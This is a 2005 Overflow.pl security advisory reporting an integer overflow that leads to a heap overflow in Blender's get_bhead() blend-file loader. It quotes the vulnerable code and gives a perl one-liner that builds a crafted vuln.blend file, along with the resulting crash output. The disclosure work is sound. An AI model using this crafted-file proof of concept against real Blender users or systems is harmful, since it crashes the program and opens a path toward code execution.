[Overflow.pl] Blender BlenLoader Integer Overflow

Type securityvulns
Reporter Securityvulns
Modified 2005-12-21T00:00:00


Overflow.pl Security Advisory #4

Blender BlenLoader Integer Overflow

Vendor: Blender (http://www.blender.org) Affected version: 2.x up to and including 2.40pre Vendor status: Notified. No patch available.

Author: Damian Put <pucik@overflow.pl> URL: http://www.overflow.pl/adv/blenderinteger.txt Date: 20.12.2005

  1. Background

Blender is the open source software for 3D modeling, animation, rendering, post-production, interactive creation and playback. Available for all major operating systems under the GNU Public License.


  1. Description

Remote exploitation of an integer overflow vulnerability could allow execution of arbitrary code or cause denial of service.

An integer overflow leading to heap overflow, exists in get_bhead() function, that is used to read blend file structure. It is part of BlenLoader.

The vulnerable code is:


static BHeadN get_bhead(FileData fd) { BHead8 bhead8; BHead4 bhead4; BHead bhead; BHeadN *new_bhead = 0; int readsize; ... if ( ! fd->eof) { new_bhead = MEM_mallocN(sizeof(BHeadN) + bhead.len, "new_bhead"); if (new_bhead) { new_bhead->next = new_bhead->prev = 0; new_bhead->bhead = bhead; readsize = fd->read(fd, new_bhead + 1, bhead.len);

              if &#40;readsize != bhead.len&#41; {
                    fd-&gt;eof = 1;
        } else {
              fd-&gt;eof = 1;

... return(new_bhead); }

We can manipulate with bhead.len value, because it read from blend file. Allocation of memory for new_bhead is based on bhead.len variable (MEM_mallocN() call). If value of "bhead.len" is for example -16, we allocate only 12 bytes of memory (-16 + sizeof(BHeadN)). In next part of execution it can lead to heap overflow many times.

  1. PoC

Example crafted blend file:

[root@overflow]# perl -e 'print "BLENDER_v273"; print "\xf0\xff\xff\xff"x10' > vuln.blend

Now we must only load crafted file with blender:

[root@overflow]# blender vuln.blend Using Python version 2.4 Memoryblock new_bhead: end corrupt Memoryblock new_bhead: end corrupt glibc detected malloc(): memory corruption: 0x0875eae8 *** Abort (core dumped) [root@overflow]#